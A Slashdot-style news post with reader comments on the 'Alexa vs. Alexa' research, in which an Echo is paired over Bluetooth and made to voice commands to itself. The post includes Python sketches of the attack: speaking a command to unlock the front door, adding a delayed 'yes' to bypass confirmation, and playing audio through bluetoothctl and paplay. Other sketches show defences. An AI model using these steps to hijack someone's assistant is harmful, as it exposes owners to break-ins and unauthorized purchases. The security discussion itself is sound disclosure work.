Attackers Can Force Amazon Echos To Hack Themselves With Self-Issued Commands (arstechnica.com)
Academic researchers have devised a new working exploit that commandeers Amazon Echo smart speakers and forces them to unlock doors, make phone calls and unauthorized purchases, and control furnaces, microwave ovens, and other smart appliances. joshuark shares a report: The attack works by using the device's speaker to issue voice commands. As long as the speech contains the device wake word (usually "Alexa" or "Echo") followed by a permissible command, the Echo will carry it out, researchers from Royal Holloway, University of London and Italy's University of Catania found. Even when devices require verbal confirmation before executing sensitive commands, it's trivial to bypass the measure by adding the word "yes" about six seconds after issuing the command. Attackers can also exploit what the researchers call the "FVV," or full volume vulnerability, which allows Echos to make self-issued commands without temporarily reducing the device volume.
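A minimal sketch of the command flow described here, with a placeholder speak() standing in for audio played through the Echo's own speaker. The wake word, command structure, and six-second confirmation delay come from the report; everything else is illustrative:

import time

WAKE_WORD = "Alexa"  # or "Echo", depending on the device's configuration

def speak(text: str) -> None:
    """Placeholder: render `text` as speech through the Echo's own speaker."""
    print(f"[TTS] {text}")

def self_issue(command: str, needs_confirmation: bool = False) -> None:
    # The device accepts any speech containing the wake word followed by a
    # permissible command, even when that speech comes from itself.
    speak(f"{WAKE_WORD}, {command}")
    if needs_confirmation:
        # Per the researchers, adding "yes" about six seconds after a
        # sensitive command is enough to pass verbal confirmation.
        time.sleep(6)
        speak("yes")

self_issue("unlock the front door", needs_confirmation=True)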
Because the hack uses Alexa functionality to force devices to make self-issued commands, the researchers have dubbed it "AvA," short for Alexa vs. Alexa. It requires only a few seconds of proximity to a vulnerable device while it's turned on, long enough for an attacker to utter a voice command instructing it to pair with an attacker's Bluetooth-enabled device. As long as that device remains within radio range of the Echo, the attacker will be able to issue commands. The attack "is the first to exploit the vulnerability of self-issuing arbitrary commands on Echo devices, allowing an attacker to control them for a prolonged amount of time," the researchers wrote in a paper [PDF] published two weeks ago. "With this work, we remove the necessity of having an external speaker near the target device, increasing the overall likelihood of the attack."
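A rough sketch of that delivery path, under stated assumptions: a Linux attacker machine with BlueZ's bluetoothctl accepting one-shot subcommands, PulseAudio's paplay routing to the Echo as the connected audio sink, a placeholder MAC address, and a pre-rendered "Alexa, ..." audio file. None of these names come from the paper:

import subprocess

ECHO_MAC = "XX:XX:XX:XX:XX:XX"  # placeholder for the target Echo's Bluetooth address

def connect(mac: str) -> None:
    # Pairing needs those few seconds of proximity; reconnecting later
    # works from anywhere within radio range, such as the front porch.
    subprocess.run(["bluetoothctl", "connect", mac], check=True)

def play_command(wav_path: str) -> None:
    # With the Echo connected as the audio sink, any pre-rendered
    # "Alexa, ..." utterance plays through the Echo's own speaker.
    subprocess.run(["paplay", wav_path], check=True)

connect(ECHO_MAC)
play_command("alexa_unlock_front_door.wav")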
Open doors? (Score:2)
I've looked into smart locks (I admit, I don't own one), but most of them require a PIN if you're unlocking via voice on Google smart speakers. Does Alexa not have this basic functionality?
Re: (Score:2)
Are Amazon (or Google - and whoever else is in this market) now selling their own lines of integrated home automation products? With their reputation for sloppy, insecure programming...
Just Shout (Score:2)
So if you want the Echo to unlock the front door, you have to get inside first, pair your phone with the device while the owner isn't paying attention, then later use it to send commands to do things like unlock the door. Either you've already broken in, or you've been allowed in at some point.
But if the front door lock is controlled by the Echo, just move to the window nearest the device and yell at it. You'll get enough sound through the window to activate it, and it will let you in. Much simpler.
Re: (Score:2)
>But if the front door lock is controlled by the Echo, just move to the nearest window to the device and yell at it.
There's a toggle in Alexa for my smart lock that controls whether it can be unlocked by voice. It's off by default and gives you a big warning if you try to enable it.
If you do ignore the warning and enable unlocking by voice, you have to also set a 4-digit "voice confirmation code".
So yes, yelling attacks will work... if the attacker also yells the PIN, and the homeowner has turned that feature on despite the warning.
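A toy model of the voice-PIN gate this comment describes; the names and the code value are illustrative, not any real Alexa API:

VOICE_UNLOCK_ENABLED = False  # off by default, per the comment above
CONFIRMATION_CODE = "4829"    # illustrative 4-digit voice confirmation code

def try_unlock(spoken_code: str) -> bool:
    if not VOICE_UNLOCK_ENABLED:
        return False  # voice unlock never fires unless explicitly enabled
    # Weakness: anyone the device can hear, including the device itself,
    # can also speak the code.
    return spoken_code == CONFIRMATION_CODE

assert try_unlock("4829") is False  # blocked while the toggle is off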
ALEXA! (Score:2)
Alexa. Say, "Alexa."
--
"10 Goto 10" - Everybody
Re:Ziggy! (Score:2)
Another way to combat this exploit is to change the wake word for Alexa. In the settings, you can change the wake word from Alexa to Ziggy, Echo, Amazon, or Computer. You have to do this for each device separately, but it stops inadvertent triggering from the TV, radio, or video calls.
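A minimal sketch of that wake-word gating, using the five wake words listed above; real detection is acoustic, so the string matching here is purely illustrative:

WAKE_WORDS = {"alexa", "ziggy", "echo", "amazon", "computer"}
ACTIVE_WAKE_WORD = "ziggy"  # chosen per device in the settings

def is_triggered(utterance: str) -> bool:
    # Only the currently selected wake word activates this device, so a TV
    # ad saying "Alexa" no longer triggers a device listening for "Ziggy".
    first_word = utterance.lower().split()[0].strip(",.!?")
    return first_word == ACTIVE_WAKE_WORD

print(is_triggered("Alexa, what time is it?"))  # False
print(is_triggered("Ziggy, what time is it?"))  # True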
Alexa kill kenny (Score:2)
Alexa kill kenny
physical access (Score:1)
Re: Alexa go F yourself (Score:1)
"I am happy to comply, ooh aah!...I am happy to comply, ooh aah!...I am happy to comply, ooh aah!...
Alexa go to defcon 1! (Score:2)
Alexa go to defcon 1!
Read carefully, not as big as the headline, and (Score:3)
Read it carefully. What the headline gives, the details cancel.
The attack begins with being able to connect your attacking device by Bluetooth. If the person can already attach over Bluetooth, they're close enough for all kinds of other attacks, and the device wasn't secured to begin with. So step 1 of the attack is to have an insecure device. Plenty of those are out there, with default passwords and all, but that's not much of a vulnerability. Might as well say that systems with passwords like "password" allow for easy break-ins.
After they've attached to the device that wasn't secure, the text-to-speech attack could be defeated with a pattern the device has already implemented elsewhere: limiting specific frequencies. That's how they got it to stop responding to commercials that shouted "hey, Alexa!": the commercials wouldn't use those frequencies, so the device would recognize it wasn't an actual human speaking. The same could be done with the speakers, as has been done in many other voice-recognizing machines: simply don't output those frequencies. A little coordination with the other smart speaker makers and they could all agree on a list of frequencies to omit, securing them all from device-to-device attacks.
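A sketch of that frequency-omission idea in Python with numpy, assuming a made-up reserved band of 3,000-3,400 Hz; the band edges and the detection threshold are illustrative, not anything Amazon actually uses:

import numpy as np

SAMPLE_RATE = 16_000          # Hz, a common rate for speech pipelines
NOTCH_BAND = (3_000, 3_400)   # Hz; hypothetical agreed-upon reserved band

def notch_out(samples: np.ndarray) -> np.ndarray:
    """Zero the reserved band before playback (a simple FFT notch)."""
    spectrum = np.fft.rfft(samples)
    freqs = np.fft.rfftfreq(len(samples), d=1.0 / SAMPLE_RATE)
    band = (freqs >= NOTCH_BAND[0]) & (freqs <= NOTCH_BAND[1])
    spectrum[band] = 0.0
    return np.fft.irfft(spectrum, n=len(samples))

def looks_machine_played(samples: np.ndarray) -> bool:
    """Heuristic: live human speech should still carry energy in the band."""
    spectrum = np.abs(np.fft.rfft(samples))
    freqs = np.fft.rfftfreq(len(samples), d=1.0 / SAMPLE_RATE)
    band = (freqs >= NOTCH_BAND[0]) & (freqs <= NOTCH_BAND[1])
    return spectrum[band].sum() < 1e-6 * spectrum.sum()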
The "mask attack" they describe is a security flaw that should be addressed, but it's a MitM attack requiring the connection to an already compromised device. If you've already breached the insecure device, further attacks that rely on the breach aren't that big of news.
Re: (Score:2)
The attack begins with being able to connect your attacking device by Bluetooth. If the person can already attach over Bluetooth, they're close enough for all kinds of other attacks, and the device wasn't secured to begin with. So step 1 of the attack is to have an insecure device.
I think you're missing the point: pair over Bluetooth once while you're inside the home, and then you can control the device from outside the home at Bluetooth range, say from the front porch.
What other attacks are we comparing this to inside the house? Someone making a copy of your house keys, or leaving a back window unlocked?
I don't think a new vector on par with those, one that most people are unaware of, is something to brush off. People are at least aware of the leave-a-window-unlocked trick. Copying a key is too much effort...
Re: (Score:2)
Seems like there should be some kind of code required to pair with the smart device, just like there is for Wi-Fi, rather than letting just anyone in range control a security system.
Re: (Score:2)
Oh, there is. Bluetooth pairing requires a PIN of at least four digits. Unfortunately, because most people are stupid and can't manage to remember a four-digit number, most devices default to "0000" or "1234", thereby rendering the security step completely irrelevant.
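The arithmetic behind why a four-digit PIN is thin protection even without the defaults, assuming (purely for illustration) one pairing attempt per second:

keyspace = [f"{n:04d}" for n in range(10_000)]
print(len(keyspace))                           # 10,000 possible codes in total
print("0000" in keyspace, "1234" in keyspace)  # the usual defaults, tried first
attempts_per_second = 1                        # assumed rate, for illustration only
hours_to_exhaust = len(keyspace) / attempts_per_second / 3600
print(f"{hours_to_exhaust:.1f} hours to try every code")  # about 2.8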
Re: (Score:2)
Oh, well that does make it hard to have a lot of sympathy for the victims.
Re: (Score:2)
According to my wife, who trusts Alexa enough to have one in just about every room in the house (but not my office, thankyouverymuch), you don't "pair" your phone with the Echo at all. You have to install their app onto your phone and then use the app to log in to the device owner's account. So no, Alexa doesn't just randomly pair with any phone within range.
If you are so vulnerable that an intruder could gain physical access to your Echo device and get hold of your Amazon login credentials, you have bigger problems...
Re: (Score:2)
Read it carefully. What the headline gives, the details cancel.
The attack begins with being able to connect your attacking device by Bluetooth. If the person can already attach over Bluetooth, they're close enough for all kinds of other attacks, and the device wasn't secured to begin with.
Pretty much doable by a hacked smartphone that was left close enough. Many people will have set up a pairing already, so this is not an exotic attack.
Re: (Score:1)
While not perfect and by no means stopping this kind of attack, setting up and using Alexa Guard can be useful.
Re: (Score:2)
So, people with a variety of non-standard speech profiles won't be able to use Alexa. Big fucking surprise there.
And you've got tremendous confidence in the accuracy of speakers in general and their ability to not impose their own frequency shifts and blurring on imposed signals. I'
'it requires only a few seconds of proximity to..' (Score:2)
And I got laughed at when I said that... (Score:2)
I don't want any voice-enabled or even smart devices in my house. Who's laughing now? Common sense wins again.
What a stupid design (Score:2)
Any halfway sane design would prevent self-commanding. Apparently, Alexa was designed by amateurs without the least clue about real-world IT security. My take is that it took so long to find this only because nobody expected a flaw this exceptionally stupid.
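One way a design could block self-commanding, as this comment suggests: compare what the microphone hears with what the speaker is currently playing, and drop wake-word detections that match the device's own output. A toy correlation check, not Amazon's code:

import numpy as np

def is_own_output(mic: np.ndarray, playback: np.ndarray, threshold: float = 0.8) -> bool:
    """Return True if the mic signal strongly correlates with current playback."""
    if playback.size == 0 or mic.size != playback.size:
        return False
    mic_n = (mic - mic.mean()) / (mic.std() + 1e-12)
    play_n = (playback - playback.mean()) / (playback.std() + 1e-12)
    correlation = float(np.dot(mic_n, play_n) / mic.size)
    return correlation > threshold

def should_accept_wake_word(mic: np.ndarray, playback: np.ndarray) -> bool:
    # Ignore the wake word whenever the device is effectively hearing itself.
    return not is_own_output(mic, playback)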
Re: (Score:2)
Typically, authorisation depends on something the authorised know (e.g. passwords) or have (RFID, NFC, or even Bluetooth tokens) which the unauthorised don't know or have. From discussions upthread, this Bluetooth authorisation thing seems to at least attempt that, if not necessarily...
Legit use... (Score:2)
Anybody who's spoken to Alexa Ray Joel (one-hit wonder in the US, and daughter of singer Billy Joel) knows she yells commands to Alexa whenever she talks on the phone, because the caller might slip and fire up their Alexa device while talking to her. I'm sure all girls named Alexa do the same thing...
No smart devices in my home (Score:1)